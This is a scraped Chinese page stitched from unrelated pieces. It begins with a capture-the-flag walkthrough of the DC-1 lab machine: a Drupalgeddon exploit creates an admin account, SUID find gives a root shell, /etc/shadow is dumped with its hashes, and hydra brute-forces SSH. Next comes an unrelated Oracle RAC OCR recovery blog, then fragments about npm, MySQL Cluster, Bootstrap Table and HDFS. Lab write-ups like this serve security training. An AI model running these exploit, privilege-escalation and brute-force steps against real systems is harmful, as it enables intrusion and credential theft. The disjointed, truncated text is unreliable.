    Drupal 4.7 - 'Attachment mod_mime' Remote Command Execution                                            | php/webapps/1821.php
    Drupal 4.x - URL-Encoded Input HTML Injection                                                          | php/webapps/27020.txt
    Drupal 5.2 - PHP Zend Hash ation Vector                                                                | php/webapps/4510.txt
    Drupal 5.21/6.16 - Denial of Service                                                                   | php/dos/10826.sh
    Drupal 6.15 - Multiple Persistent Cross-Site Scripting Vulnerabilities                                 | php/webapps/11060.txt
    Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (Add Admin User)                                      | php/webapps/34992.py
    Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (Admin Session)                                       | php/webapps/44355.php
    Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (PoC) (Reset Password) (1)                            | php/webapps/34984.py
    Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (PoC) (Reset Password) (2)                            | php/webapps/34993.php
    Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (Remote Code Execution)                               | php/webapps/35150.php
    Drupal 7.12 - Multiple Vulnerabilities                                                                 | php/webapps/18564.txt
    Drupal 7.x Module Services - Remote Code Execution                                                     | php/webapps/41564.php
    Drupal < 4.7.6 - Post Comments Remote Command Execution                                                | php/webapps/3313.pl
    Drupal < 5.1 - Post Comments Remote Command Execution                                                  | php/webapps/3312.pl
    Drupal < 5.22/6.16 - Multiple Vulnerabilities                                                          | php/webapps/33706.txt
    Drupal < 7.34 - Denial of Service                                                                      | php/dos/35415.txt
    Drupal < 7.58 - 'Drupalgeddon3' (Authenticated) Remote Code (Metasploit)                               | php/webapps/44557.rb
    Drupal < 7.58 - 'Drupalgeddon3' (Authenticated) Remote Code Execution (PoC)                            | php/webapps/44542.txt
    Drupal < 7.58 / < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution                    | php/webapps/44449.rb
    Drupal < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution (Metasploit)                | php/remote/44482.rb
    Drupal < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution (PoC)                       | php/webapps/44448.py
    Drupal < 8.5.11 / < 8.6.10 - RESTful Web Services unserialize() Remote Command Execution (Metasploit)  | php/remote/46510.rb
    Drupal < 8.6.10 / < 8.5.11 - REST Module Remote Code Execution                                         | php/webapps/46452.txt
    Drupal < 8.6.9 - REST Module Remote Code Execution                                                     | php/webapps/46459.py
    Drupal avatar_uploader v7.x-1.0-beta8 - Arbitrary File Disclosure                                      | php/webapps/44501.txt
    Drupal Module Ajax Checklist 5.x-1.0 - Multiple SQL Injections                                         | php/webapps/32415.txt
    Drupal Module CAPTCHA - Security Bypass                                                                | php/webapps/35335.html
    Drupal Module CKEditor 3.0 < 3.6.2 - Persistent EventHandler Cross-Site Scripting                      | php/webapps/18389.txt
    Drupal Module CKEditor < 4.1WYSIWYG (Drupal 6.x/7.x) - Persistent Cross-Site Scripting                 | php/webapps/25493.txt
    Drupal Module CODER 2.5 - Remote Command Execution (Metasploit)                                        | php/webapps/40149.rb
    Drupal Module Coder < 7.x-1.3/7.x-2.6 - Remote Code Execution                                          | php/remote/40144.php
    Drupal Module Cumulus 5.x-1.1/6.x-1.4 - 'tagcloud' Cross-Site Scripting                                | php/webapps/35397.txt
    Drupal Module Drag & Drop Gallery 6.x-1.5 - 'upload.php' Arbitrary File Upload                         | php/webapps/37453.php
    Drupal Module Embedded Media Field/Media 6.x : Video Flotsam/Media: Audio Flotsam - Multiple Vulnerabi | php/webapps/35072.txt
    Drupal Module RESTWS 7.x - PHP Remote Code Execution (Metasploit)                                      | php/remote/40130.rb
    Drupal Module Sections - Cross-Site Scripting                                                          | php/webapps/10485.txt
    Drupal Module Sections 5.x-1.2/6.x-1.2 - HTML Injection                                                | php/webapps/33410.txt
    ------------------------------------------------------------------------------------------------------- ---------------------------------
    Shellcodes: No Results
    

    注意到有这一行

    Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (Add Admin User)                                   | php/webapps/34992.py

    好家伙,竟然可以增加admin用户。那就增加adminadd/adminadd吧。

    ┌──(root??kali)-[~]
    └─# python /usr/share/exploitdb/exploits/php/webapps/34992.py -t http://192.168.56.102 -u adminadd -p adminadd
      ______                          __     _______  ___                                                                                    ____ _____
     |   _  \ .----.--.--.-----.---.-|  |   |   _   ||                                                                                       _   | _   |
     |.  |   \|   _|  |  |  _  |  _  |  |   |___|   _|___                                                                                    |   |.|   |
     |.  |    |__| |_____|   __|___._|__|      /   |___(_                                                                                    _   `-|.  |
     |:  1    /          |__|                 |   |  |:                                                                                      1   | |:  |
     |::.. . /                                |   |  |::.                                                                                    . . | |::.|
     `------'                                 `---'  `---                                                                                    ----' `---'
      _______       __     ___       __            __   _                                                                                    _
     |   _   .-----|  |   |   .-----|__.-----.----|  |_|_                                                                                    _.-----.-----.
     |   1___|  _  |  |   |.  |     |  |  -__|  __|   _|                                                                                      |  _  |     |
     |____   |__   |__|   |.  |__|__|  |_____|____|____|_                                                                                    _|_____|__|__|
     |:  1   |  |__|      |:  |    |___|                                                                                                     
     |::.. . |            |::.|                                                                                                              
     `-------'            `---'                                                                                                              
                                                                                                                                             
                                     Drup4l => 7.0 <= 7.3                                                                                    1 Sql-1nj3ct10n
                                                  Admin 4                                                                                    cc0unt cr3at0r
    
                              Discovered by:
    
                              Stefan  Horst
                             (CVE-2014-3704)
    
                               Written by:
    
                             Claudio Viviani
    
                          http://www.homelab.it
    
                             info@homelab.it
                         homelabit@protonmail.ch
    
                     https://www.facebook.com/homelabit
                       https://twitter.com/homelabit
                     https://plus.google.com/+HomelabIt1/
           https://www.youtube.com/channel/UCqqmSdMqf_exi                                                                                    cCe_DjlBww
    
    
    [!] VULNERABLE!
    
    [!] Administrator user created!
    
    [*] Login: adminadd
    [*] Pass: adminadd
    [*] Url: http://192.168.56.102/?q=node&destination=no                                                                                    de

    步骤6 flag3发现
    用这个用户和密码登陆网页,可以轻松发现flag3

    步骤7 提升权限
    分析flag3的内容。提示我们应该要查看shadow文件,在查看文件前要获得提权。

    mysql> exit;
    exit;
    Bye
    www-data@DC-1:/$ find / -perm -4000
    find / -perm -4000
    /bin/mount
    /bin/ping
    /bin/su
    /bin/ping6
    /bin/umount
    /usr/bin/at
    /usr/bin/chsh
    /usr/bin/passwd
    /usr/bin/newgrp
    /usr/bin/chfn
    /usr/bin/gpasswd
    /usr/bin/procmail
    /usr/bin/find
    /usr/sbin/exim4
    /usr/lib/pt_chown
    /usr/lib/openssh/ssh-keysign
    /usr/lib/eject/dmcrypt-get-device
    /usr/lib/dbus-1.0/dbus-daemon-launch-helper
    /sbin/mount.nfs
    find: `/proc/5069/task/5069/fd/6': No such file or directory
    find: `/proc/5069/task/5069/fdinfo/6': No such file or directory
    find: `/proc/5069/fd/6': No such file or directory
    find: `/proc/5069/fdinfo/6': No such file or directory

    可以使用find命令提权root

    www-data@DC-1:/$ find ./ aaa -exec '/bin/sh' \;
    find ./ aaa -exec '/bin/sh' \;
    # cat /etc/shadow
    cat /etc/shadow
    root:$6$rhe3rFqk$NwHzwJ4H7abOFOM67.Avwl3j8c05rDVPqTIvWg8k3yWe99pivz/96.K7IqPlbBCmzpokVmn13ZhVyQGrQ4phd/:17955:0:99999:7:::
    daemon:*:17946:0:99999:7:::
    bin:*:17946:0:99999:7:::
    sys:*:17946:0:99999:7:::
    sync:*:17946:0:99999:7:::
    games:*:17946:0:99999:7:::
    man:*:17946:0:99999:7:::
    lp:*:17946:0:99999:7:::
    mail:*:17946:0:99999:7:::
    news:*:17946:0:99999:7:::
    uucp:*:17946:0:99999:7:::
    proxy:*:17946:0:99999:7:::
    www-data:*:17946:0:99999:7:::
    backup:*:17946:0:99999:7:::
    list:*:17946:0:99999:7:::
    irc:*:17946:0:99999:7:::
    gnats:*:17946:0:99999:7:::
    nobody:*:17946:0:99999:7:::
    libuuid:!:17946:0:99999:7:::
    Debian-exim:!:17946:0:99999:7:::
    statd:*:17946:0:99999:7:::
    messagebus:*:17946:0:99999:7:::
    sshd:*:17946:0:99999:7:::
    mysql:!:17946:0:99999:7:::
    flag4:$6$Nk47pS8q$vTXHYXBFqOoZERNGFThbnZfi5LN0ucGZe05VMtMuIFyqYzY/eVbPNMZ7lpfRVc0BYrQ0brAhJoEzoEWCKxVW80:17946:0:99999:7:::
    

    步骤8 flag4发现
    发现了flag4用户,很明显信息就在这用户的空间里,但是密码是强加密的无法直接破解。准备用爆破的方法获取密码。

    ┌──(root??kali)-[/zyy]
    └─# hydra -l flag4 -P /zyy/passwdlist.lst ssh://192.168.56.102
    Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
    
    Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-12-18 03:21:26
    [WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
    [DATA] max 5 tasks per 1 server, overall 5 tasks, 5 login tries (l:1/p:0), ~5 try per task
    [DATA] attacking ssh://192.168.56.102:22/
    [22][ssh] host: 192.168.56.102   login: flag4   password: orange
    1 of 1 target successfully completed, 1 valid password found
    Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-12-18 03:21:29

    爆破得到了flag4的密码是orange。用该账号密码登陆,可以轻松找到flag4.txt

    ┌──(root??kali)-[/zyy]
    └─# ssh flag4@192.168.56.102
    The authenticity of host '192.168.56.102 (192.168.56.102)' can't be established.
    ECDSA key fingerprint is SHA256:89B+YqcNl4cSf/BZk26MQG1QeW4BvBlVENMbTRhVhsU.
    Are you sure you want to continue connecting (yes/no/[fingerprint])? y
    Please type 'yes', 'no' or the fingerprint: yes
    Warning: Permanently added '192.168.56.102' (ECDSA) to the list of known hosts.
    flag4@192.168.56.102's password:
    Linux DC-1 3.2.0-6-486 #1 Debian 3.2.102-1 i686
    
    The programs included with the Debian GNU/Linux system are free software;
    the exact distribution terms for each program are described in the
    individual files in /usr/share/doc/*/copyright.
    
    Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
    permitted by applicable law.
    Last login: Thu Dec 17 17:50:35 2020
    flag4@DC-1:~$ cat flag4.txt
    Can you use this same method to find or access the flag in root?
    
    Probably. But perhaps it's not that easy.  Or maybe it is?

    步骤9 找到thefinalflag
    根据提示,应该把获得root权限作为下一个目标,而且应该直接就能找到。而此时明显是普通用户,因此我们可以再用一遍find提权,转过头发现步骤7的窗口还开着,那就直接进去找thefinalflag吧。那就直接进去找吧。

    # cd /root
    cd /root
    # cat thefinalflag.txt
    cat thefinalflag.txt
    Well done!!!!
    
    Hopefully you've enjoyed this and learned some new skills.
    
    You can let me know what you thought of this little journey
    by contacting me via Twitter - @DCAU7
    

    至此,DC-1靶机的五个flag都找到了。

    展开全文
  • :OLR resides on every node in the cluster and manages Oracle Clusterware configuration information for each particular node   四、解决方法: 1. 查看自动备份的全路径: $ ocrconfig -...

    一、环境描述:

     RedHat5.8 + ORACLE11204 + RAC

     

    二、问题描述:

    OCR(Oracle Cluster Registry)、Voting disk(Voting disks manage information about node membership)对应的物理磁盘损坏,从自动备份的OCR_VOTE集群服务无法正常启动,报错如下:

     

     ohasd.log:

    [ohasd(18298)]CRS-0704:Oracle High Availability Service aborted due to Oracle Local Registry error [PROCL-24: Error in the messaging layer Messaging error [gipcretAddressInUse] [20]]. Details at (:OHAS00106:) in /u01/app/11.2.0/grid/log/kawjrmdb001l/ohasd/ohasd.log.
    [client(18359)]CRS-10001:CRS-10132: No msg for has:crs-10132 [10][60]

     

    ossd.log

    2014-09-10 14:48:29.907: [  CRSOCR][2428572496] OCR context init failure.  Error: PROCL-24: Error in the messaging layer Messaging error [gipcretAddressInUse] [20]
    2014-09-10 14:48:29.908: [ default][2428572496] Created alert : (:OHAS00106:) :  OLR initialization failed, error: PROCL-24: Error in the messaging layer Messaging error [gipcretAddressInUse] [20]
    2014-09-10 14:48:29.908: [ default][2428572496][PANIC] OHASD exiting; Could not init OLR

    三、问题分析:

    11gR2开始,OCR、Voting disk存放于ASM磁盘组里,OCR是记录着集群的配置信息,VOTEDISK是集群的仲裁盘,二者都起着重启性作用。如果OCR VOTEDISK损坏,将无法启动集群服务包括数据库。好在集群软件会每隔4小时做一次备份,可以通过集群命令ocrconfig -showbackup来查看具体的备份文件。

    OLR:OLR resides on every node in the cluster and manages Oracle Clusterware configuration information for each particular node

     

    四、解决方法:

    1. 查看自动备份的全路径:

    $ ocrconfig -showbackup

    2. 还原OCR、VOTING DISK

    # crsctl stop crs -f

    # /u01/app/11.2.0/grid/bin/ocrconfig -local -restore /u01/app/11.2.0/grid/cdata/kawjrmd-cluster/backup00.ocr

    3. 启动集群进程

    # crsctl start crs -excl

    CRS无法启动,报错信息详见本文“问题描述”

    4. 无法初始化OLR的解决

    1. 删除OLR配置

    $GRID_HOME/crs/install/rootcrs.pl -deconfig -force

    Using configuration parameter file: ./crsconfig_params
    PRCR-1119 : Failed to look up CRS resources of ora.cluster_vip_net1.type type
    PRCR-1068 : Failed to query resources
    Cannot communicate with crsd
    PRCR-1070 : Failed to check if resource ora.gsd is registered
    Cannot communicate with crsd
    PRCR-1070 : Failed to check if resource ora.ons is registered
    Cannot communicate with crsd
    CRS-4535: Cannot communicate with Cluster Ready Services
    CRS-4000: Command Stop failed, or completed with errors.
    CRS-4544: Unable to connect to OHAS
    CRS-4000: Command Stop failed, or completed with errors.
    Removing Trace File Analyzer
    Successfully deconfigured Oracle clusterware stack on this node

     
     

    2. 执行root.sh脚本 

    # $GRID_HOME/root.sh (忽略任何报错信息)

    ./root.sh
    Performing root user operation for Oracle 11g

    The following environment variables are set as:
        ORACLE_OWNER= grid
        ORACLE_HOME=  /u01/app/11.2.0/grid

    Enter the full pathname of the local bin directory: [/usr/local/bin]:
    The contents of "dbhome" have not changed. No need to overwrite.
    The contents of "oraenv" have not changed. No need to overwrite.
    The contents of "coraenv" have not changed. No need to overwrite.

    Entries will be added to the /etc/oratab file as needed by
    Database Configuration Assistant when a database is created
    Finished running generic part of root script.
    Now product-specific root actions will be performed.
    Using configuration parameter file: /u01/app/11.2.0/grid/crs/install/crsconfig_params
    User ignored Prerequisites during installation
    Installing Trace File Analyzer
    OLR initialization - successful
    Adding Clusterware entries to inittab
    CRS-2672: Attempting to start 'ora.mdnsd' on 'kawjrmdb001l'
    CRS-2676: Start of 'ora.mdnsd' on 'kawjrmdb001l' succeeded
    CRS-2672: Attempting to start 'ora.gpnpd' on 'kawjrmdb001l'
    CRS-2676: Start of 'ora.gpnpd' on 'kawjrmdb001l' succeeded
    CRS-2672: Attempting to start 'ora.cssdmonitor' on 'kawjrmdb001l'
    CRS-2672: Attempting to start 'ora.gipcd' on 'kawjrmdb001l'
    CRS-2676: Start of 'ora.cssdmonitor' on 'kawjrmdb001l' succeeded
    CRS-2676: Start of 'ora.gipcd' on 'kawjrmdb001l' succeeded
    CRS-2672: Attempting to start 'ora.cssd' on 'kawjrmdb001l'
    CRS-2672: Attempting to start 'ora.diskmon' on 'kawjrmdb001l'
    CRS-2676: Start of 'ora.diskmon' on 'kawjrmdb001l' succeeded
    CRS-2676: Start of 'ora.cssd' on 'kawjrmdb001l' succeeded

    ASM created and started successfully.

    Disk Group OCR_VOTE created successfully.

    clscfg: -install mode specified
    Successfully accumulated necessary OCR keys.
    Creating OCR keys for user 'root', privgrp 'root'..
    Operation successful.
    Successful addition of voting disk a9be444f48c84facbfb04d9fbd60f955.
    Successfully replaced voting disk group with +OCR_VOTE.
    CRS-4266: Voting file(s) successfully replaced
    ##  STATE    File Universal Id                File Name Disk group
    --  -----    -----------------                --------- ---------
     1. ONLINE   a9be444f48c84facbfb04d9fbd60f955 (/dev/oracleasm/disks/OCR_VOTE) [OCR_VOTE]
    Located 1 voting disk(s).
    CRS-2672: Attempting to start 'ora.asm' on 'kawjrmdb001l'
    CRS-2676: Start of 'ora.asm' on 'kawjrmdb001l' succeeded
    CRS-2672: Attempting to start 'ora.OCR_VOTE.dg' on 'kawjrmdb001l'
    CRS-2676: Start of 'ora.OCR_VOTE.dg' on 'kawjrmdb001l' succeeded
    /u01/app/11.2.0/grid/bin/srvctl start nodeapps -n kawjrmdb001l ... failed
    FirstNode configuration failed at /u01/app/11.2.0/grid/crs/install/crsconfig_lib.pm line 9380.
    /u01/app/11.2.0/grid/perl/bin/perl -I/u01/app/11.2.0/grid/perl/lib -I/u01/app/11.2.0/grid/crs/install /u01/app/11.2.0/grid/crs/install/rootcrs.pl execution failed

     

    3. 关闭集群进程

    # crsctl stop crs

    CRS-2791: Starting shutdown of Oracle High Availability Services-managed resources on 'kawjrmdb001l'
    CRS-2673: Attempting to stop 'ora.crsd' on 'kawjrmdb001l'
    CRS-2790: Starting shutdown of Cluster Ready Services-managed resources on 'kawjrmdb001l'
    CRS-2673: Attempting to stop 'ora.OCR_VOTE.dg' on 'kawjrmdb001l'
    CRS-2677: Stop of 'ora.OCR_VOTE.dg' on 'kawjrmdb001l' succeeded
    CRS-2673: Attempting to stop 'ora.asm' on 'kawjrmdb001l'
    CRS-2677: Stop of 'ora.asm' on 'kawjrmdb001l' succeeded
    CRS-2792: Shutdown of Cluster Ready Services-managed resources on 'kawjrmdb001l' has completed
    CRS-2677: Stop of 'ora.crsd' on 'kawjrmdb001l' succeeded
    CRS-2673: Attempting to stop 'ora.crf' on 'kawjrmdb001l'
    CRS-2673: Attempting to stop 'ora.ctssd' on 'kawjrmdb001l'
    CRS-2673: Attempting to stop 'ora.evmd' on 'kawjrmdb001l'
    CRS-2673: Attempting to stop 'ora.asm' on 'kawjrmdb001l'
    CRS-2673: Attempting to stop 'ora.mdnsd' on 'kawjrmdb001l'
    CRS-2673: Attempting to stop 'ora.drivers.acfs' on 'kawjrmdb001l'
    CRS-2677: Stop of 'ora.evmd' on 'kawjrmdb001l' succeeded
    CRS-2677: Stop of 'ora.crf' on 'kawjrmdb001l' succeeded
    CRS-2677: Stop of 'ora.ctssd' on 'kawjrmdb001l' succeeded
    CRS-2677: Stop of 'ora.mdnsd' on 'kawjrmdb001l' succeeded
    CRS-2677: Stop of 'ora.asm' on 'kawjrmdb001l' succeeded
    CRS-2673: Attempting to stop 'ora.cluster_interconnect.haip' on 'kawjrmdb001l'
    CRS-2677: Stop of 'ora.cluster_interconnect.haip' on 'kawjrmdb001l' succeeded
    CRS-2673: Attempting to stop 'ora.cssd' on 'kawjrmdb001l'
    CRS-2677: Stop of 'ora.cssd' on 'kawjrmdb001l' succeeded
    CRS-2673: Attempting to stop 'ora.gipcd' on 'kawjrmdb001l'
    CRS-2677: Stop of 'ora.drivers.acfs' on 'kawjrmdb001l' succeeded
    CRS-2677: Stop of 'ora.gipcd' on 'kawjrmdb001l' succeeded
    CRS-2673: Attempting to stop 'ora.gpnpd' on 'kawjrmdb001l'
    CRS-2677: Stop of 'ora.gpnpd' on 'kawjrmdb001l' succeeded
    CRS-2793: Shutdown of Oracle High Availability Services-managed resources on 'kawjrmdb001l' has completed

    5. 还原OCR、VOTING DISK 

    1. 以独占模式启动CRS进程

     crsctl start crs -excl

    CRS-4123: Oracle High Availability Services has been started.
    CRS-2672: Attempting to start 'ora.mdnsd' on 'kawjrmdb001l'
    CRS-2676: Start of 'ora.mdnsd' on 'kawjrmdb001l' succeeded
    CRS-2672: Attempting to start 'ora.gpnpd' on 'kawjrmdb001l'
    CRS-2676: Start of 'ora.gpnpd' on 'kawjrmdb001l' succeeded
    CRS-2672: Attempting to start 'ora.cssdmonitor' on 'kawjrmdb001l'
    CRS-2672: Attempting to start 'ora.gipcd' on 'kawjrmdb001l'
    CRS-2676: Start of 'ora.cssdmonitor' on 'kawjrmdb001l' succeeded
    CRS-2676: Start of 'ora.gipcd' on 'kawjrmdb001l' succeeded
    CRS-2672: Attempting to start 'ora.cssd' on 'kawjrmdb001l'
    CRS-2672: Attempting to start 'ora.diskmon' on 'kawjrmdb001l'
    CRS-2676: Start of 'ora.diskmon' on 'kawjrmdb001l' succeeded
    CRS-2676: Start of 'ora.cssd' on 'kawjrmdb001l' succeeded
    CRS-2672: Attempting to start 'ora.ctssd' on 'kawjrmdb001l'
    CRS-2672: Attempting to start 'ora.drivers.acfs' on 'kawjrmdb001l'
    CRS-2679: Attempting to clean 'ora.cluster_interconnect.haip' on 'kawjrmdb001l'
    CRS-2681: Clean of 'ora.cluster_interconnect.haip' on 'kawjrmdb001l' succeeded
    CRS-2672: Attempting to start 'ora.cluster_interconnect.haip' on 'kawjrmdb001l'
    CRS-2676: Start of 'ora.drivers.acfs' on 'kawjrmdb001l' succeeded
    CRS-2676: Start of 'ora.ctssd' on 'kawjrmdb001l' succeeded
    CRS-2676: Start of 'ora.cluster_interconnect.haip' on 'kawjrmdb001l' succeeded
    CRS-2672: Attempting to start 'ora.asm' on 'kawjrmdb001l'
    CRS-2676: Start of 'ora.asm' on 'kawjrmdb001l' succeeded
    CRS-2672: Attempting to start 'ora.crsd' on 'kawjrmdb001l'
    CRS-2676: Start of 'ora.crsd' on 'kawjrmdb001l' succeeded

    2. 关闭crsd进程 

    crsctl stop resource ora.crsd -init

    CRS-2673: Attempting to stop 'ora.crsd' on 'kawjrmdb001l'
    CRS-2677: Stop of 'ora.crsd' on 'kawjrmdb001l' succeeded

    3. 从备份中还原OCR

    # /u01/app/11.2.0/grid/bin/ocrconfig -restore /u01/app/11.2.0/grid/cdata/kawjrmd-cluster/backup00.ocr

    $ocrcheck
    Status of Oracle Cluster Registry is as follows :
             Version                  :          3
             Total space (kbytes)     :     262120
             Used space (kbytes)      :       3124
             Available space (kbytes) :     258996
             ID                       :  742521882
             Device/File Name         :  +OCR_VOTE
                                        Device/File integrity check succeeded

                                        Device/File not configured

                                        Device/File not configured

                                        Device/File not configured

                                        Device/File not configured

             Cluster registry integrity check succeeded

             Logical corruption check succeeded

    4. 重启CRS进程

    # crsctl stop crs -f

    CRS-2791: Starting shutdown of Oracle High Availability Services-managed resources on 'kawjrmdb001l'
    CRS-2673: Attempting to stop 'ora.drivers.acfs' on 'kawjrmdb001l'
    CRS-2673: Attempting to stop 'ora.mdnsd' on 'kawjrmdb001l'
    CRS-2673: Attempting to stop 'ora.ctssd' on 'kawjrmdb001l'
    CRS-2673: Attempting to stop 'ora.asm' on 'kawjrmdb001l'
    CRS-2677: Stop of 'ora.ctssd' on 'kawjrmdb001l' succeeded
    CRS-2677: Stop of 'ora.mdnsd' on 'kawjrmdb001l' succeeded
    CRS-2677: Stop of 'ora.asm' on 'kawjrmdb001l' succeeded
    CRS-2673: Attempting to stop 'ora.cluster_interconnect.haip' on 'kawjrmdb001l'
    CRS-2677: Stop of 'ora.cluster_interconnect.haip' on 'kawjrmdb001l' succeeded
    CRS-2673: Attempting to stop 'ora.cssd' on 'kawjrmdb001l'
    CRS-2677: Stop of 'ora.cssd' on 'kawjrmdb001l' succeeded
    CRS-2673: Attempting to stop 'ora.gipcd' on 'kawjrmdb001l'
    CRS-2677: Stop of 'ora.drivers.acfs' on 'kawjrmdb001l' succeeded
    CRS-2677: Stop of 'ora.gipcd' on 'kawjrmdb001l' succeeded
    CRS-2673: Attempting to stop 'ora.gpnpd' on 'kawjrmdb001l'
    CRS-2677: Stop of 'ora.gpnpd' on 'kawjrmdb001l' succeeded
    CRS-2793: Shutdown of Oracle High Availability Services-managed resources on 'kawjrmdb001l' has completed
    CRS-4133: Oracle High Availability Services has been stopped.

     

    # crsctl start crs <all nodes>

    $ crsctl stat res -t 

    --------------------------------------------------------------------------------
    NAME           TARGET  STATE        SERVER                   STATE_DETAILS      
    --------------------------------------------------------------------------------
    Local Resources
    --------------------------------------------------------------------------------
    ora.DATA.dg
                   ONLINE  OFFLINE      kawjrmdb001l                                
                   ONLINE  OFFLINE      kawjrmdb002l                                
    ora.LISTENER.lsnr
                   ONLINE  OFFLINE      kawjrmdb001l                                
                   ONLINE  OFFLINE      kawjrmdb002l                                
    ora.OCR_VOTE.dg
                   ONLINE  ONLINE       kawjrmdb001l                                
                   ONLINE  ONLINE       kawjrmdb002l                                
    ora.asm
                   ONLINE  ONLINE       kawjrmdb001l             Started            
                   ONLINE  ONLINE       kawjrmdb002l             Started            
    ora.gsd
                   OFFLINE OFFLINE      kawjrmdb001l                                
                   OFFLINE OFFLINE      kawjrmdb002l                                
    ora.net1.network
                   ONLINE  OFFLINE      kawjrmdb001l                                
                   ONLINE  OFFLINE      kawjrmdb002l                                
    ora.ons
                   ONLINE  OFFLINE      kawjrmdb001l                                
                   ONLINE  OFFLINE      kawjrmdb002l                                
    ora.registry.acfs
                   ONLINE  ONLINE       kawjrmdb001l                                
                   ONLINE  ONLINE       kawjrmdb002l                                
    --------------------------------------------------------------------------------
    Cluster Resources
    --------------------------------------------------------------------------------
    ora.LISTENER_SCAN1.lsnr
          1        ONLINE  OFFLINE                                                  
    ora.cvu
          1        ONLINE  OFFLINE                                                  
    ora.filesrv.db
          1        ONLINE  OFFLINE                               Instance Shutdown  
          2        ONLINE  OFFLINE                               Instance Shutdown  
    ora.fjrcpmis.db
          1        ONLINE  OFFLINE                               Instance Shutdown  
          2        ONLINE  OFFLINE                               Instance Shutdown  
    ora.kawjrmdb001l.vip
          1        ONLINE  OFFLINE                                                  
    ora.kawjrmdb002l.vip
          1        ONLINE  OFFLINE                                                  
    ora.oc4j
          1        ONLINE  ONLINE       kawjrmdb001l                                
    ora.scan1.vip
          1        ONLINE  OFFLINE                                                  

     

    至此,OCR、VOTING DISK已经恢复完成,集群服务也顺利启动。

     

    五、启示总结

    关键性的设备或文件尽量要做冗余,如OCR、VOTING DISK,controlfile,redo logfile...

    -------------------------------------------------------------------------------------------------

    本文来自于我的技术博客 http://blog.csdn.net/robo23

    转载请标注源文链接,否则追究法律责任!

     

    展开全文
  • 一、描述 linux和windows npm run build报如下错误 error in ./src/assets/images/404_images/404.png Module build failed (from ./node_modules/image-webpack-...- /UI/node_modules/imagemin-gifsicle/i.

    一、问题描述

      linux和windows npm run build报如下错误

    error  in ./src/assets/images/404_images/404.png
    
    Module build failed (from ./node_modules/image-webpack-loader/index.js):
    Error: Cannot find module 'gifsicle'
    Require stack:
    - /UI/node_modules/imagemin-gifsicle/index.js
    - /UI/node_modules/image-webpack-loader/index.js

    这是由于image-webpack-loader没有完全拉取下来:
    image-webpack-loaderr依赖的图片处理库都需要拉取bin文件

        "requires": {
            "imagemin": "^7.0.0",
            "imagemin-gifsicle": "^6.0.1",
            "imagemin-mozjpeg": "^8.0.0",
            "imagemin-optipng": "^7.0.0",
            "imagemin-pngquant": "^8.0.0",
            "imagemin-svgo": "^7.0.0",
            "imagemin-webp": "^5.1.0",
            "loader-utils": "^1.2.3",
            "object-assign": "^4.1.1"
        }

    二.解决方法

    先卸载

    npm uninstall image-webpack-loader

    然后使用

    cnpm install image-webpack-loader --save-dev

    就可以了

    展开全文
  • MySQL Cluster7.2.15安装部署性能测试

    万次阅读 2019-06-22 10:50:13
    1 下载 Download the cluster tar.gz wget http://dev.mysql.com/get/Downloads/MySQL-Cluster-7.2/mysql-cluster-gpl-7.2.15.tar.gz MySQL Cluster 7.2.15 Select Version: 下拉框选择 7.2.15 Select Platform: ...
  • 摘自:...id=290807.1&_afrWindowMode=0&_adf.ctrl-state=44xjl42hq_257 Deploying JRE (Native Plug-in) for Windows Clients in Oracle E-Business Suite 11i (文档 ID 290807.1)
  • DataLink Layer

    千次阅读 2015-08-02 23:23:14
    DataLink LayerDataLink Layer - Accessing the MediaData Link Layer - Supporting & Connecting to Upper Layer ServicesThe Data Link layer provides a means for exchanging data over a common local media....
  • BootStrap Table:表格参数

    万次阅读 2018-06-09 09:27:42
    data-search-on-enter-key Boolean false 设置为 true时,按回车触发搜索方法,否则自动触发搜索方法。 strictSearch data-strict-search Boolean false 设置为 true启用...
  • summary:ydzs-node1: unable to fetch metrics from Kubelet ydzs-node1 (10.151.30.22): Get https://10.151.30.22:10250/stats/summary?only_cpu_and_memory=true: x509: cannot validate certificate for 10.151....
  • Node.js readline模块

    千次阅读 2016-09-22 19:47:03
    在nodejs的命令行模式下默认引入了readline模块,但是如果要执行node.js脚本文件的话还是需要显示引入readline模块。 注意:readline适合动态交互式流处理,不是我们平常意义上说的按行读取文件。当流被创建时,...
  • &node->fwnode : NULL; } 这里的fwnode 值的是firmware node     /** * __irq_domain_add() - Allocate a new irq_domain data structure * @fwnode: firmware node for the interrupt ...
  • Vue 13v-for循环对象.html

    千次阅读 2019-01-02 11:41:10
    13v-for循环对象.html &lt;!DOCTYPE html&gt; &lt;html&gt; &lt;head&...13v-for循环对象&lt;/title&gt; &lt;script type="text/javascript" src=&quo
  • 1.5章:StarRocks部署--集群部署

    千次阅读 2021-12-04 15:38:38
    1集群部署注意事项 在部署StarRocks生产环境前,我们需要根据业务需求设计严谨的集群架构,一般来说,我们需要注意以下几项: 1.1 FE的数量及是否需要FE的高可用 FE的Follower要求为奇数个,且并不建议部署太多,...
  • How to change hostname for ... E-Business Suite Release 12 on single node (Doc ID 1277556.1) To Bottom Modified:13-Feb-2014Type:HOWTO
  • node+vue+mysql使用历程 安装node 下载地址:https://nodejs.org/en/ (下载第一个选项就行) node安装: 双击下载好的安装包, 安装过程基本上直接点击next就可以,引导步骤会将安装目录添加到PATH...
  • 原因是因为-ls默认目录是在hdfs文件系统的/user/用户名(用户名就命令行@符号前面的那个东西),但是你的hdfs系统内没有这个...root1@ubuntu:~$ hdfs dfs -mkdir /user mkdir: Cannot create directory /user. ...
